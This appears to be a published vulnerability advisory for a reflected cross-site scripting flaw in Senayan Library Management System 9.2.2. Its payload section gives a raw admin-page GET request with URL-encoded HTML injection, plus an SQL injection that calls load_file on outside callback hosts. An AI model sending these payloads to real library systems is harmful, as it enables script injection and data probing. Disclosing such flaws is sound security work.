Headline
Senayan Library Management System 9.2.2 Cross Site Scripting
Senayan Library Management System version 9.2.2 suffers from a cross site scripting vulnerability.
## Title: Senayan Library Management System v9.2.2 a.k.a SLIMS 9 XSS-Reflected - inserting gif - redirect to outside HTTPS server## Author: nu11secur1ty## Date: 12.21.2022## Vendor: https://slims.web.id/web/## Software: https://github.com/slims/slims9_bulian/releases/tag/v9.2.2## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.2.2## Description:The value of manual insertion `point 3` is copied into the HTMLdocument as plain text between tags.The payload t8xqv<script>alert(1)</script>uou2q was submitted in themanual insertion `point 3`.This input was echoed unmodified in the application's response.The attacker can trick the already authenticated users to visit a verydangerous web page or malicious javascript exploit.## STATUS: HIGH Vulnerability[+] Payloads:```GETGET /slims9_bulian-9.2.2/admin/modules/reporting/customs/loan_by_class.php?reportView=true&year=2002&class=%3c%61%20%68%72%65%66%3d%22%68%74%74%70%73%3a%2f%2f%77%77%77%2e%6e%75%31%31%73%65%63%75%72%31%74%79%2e%63%6f%6d%2f%22%3e%3c%69%6d%67%20%73%72%63%3d%68%74%74%70%73%3a%2f%2f%6d%65%64%69%61%2e%74%65%6e%6f%72%2e%63%6f%6d%2f%2d%4b%39%73%48%78%58%41%62%2d%63%41%41%41%41%43%2f%73%68%61%6d%65%2d%6f%6e%2d%79%6f%75%2d%70%61%74%72%69%63%69%61%2e%67%69%66%22%3e&membershipType=a%27%27&collType=aaaa%27%2b(select%20load_file(%27%5c%5c%5c%5cdctiy0hziwzd4xujfqqcfd3uul0koac1fp6ft9hy.slims.web.id%5c%5cwtf%27))%2b%27%27%2b(select%20load_file(%27%5c%5c%5c%5cazditm561h7fku3yj99us8ne258zwpkgn4eu1opd.slims.web.id%5c%5cdzd%27))%2b%27HTTP/1.1Host: pwnedhost.comCache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: SenayanAdmin=ijs22qmki227r86feh6bppc56o; admin_logged_in=1Connection: close```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.2.2)## Proof and Exploit:[href](https://streamable.com/mnpw30)## Time spent`00:05:00`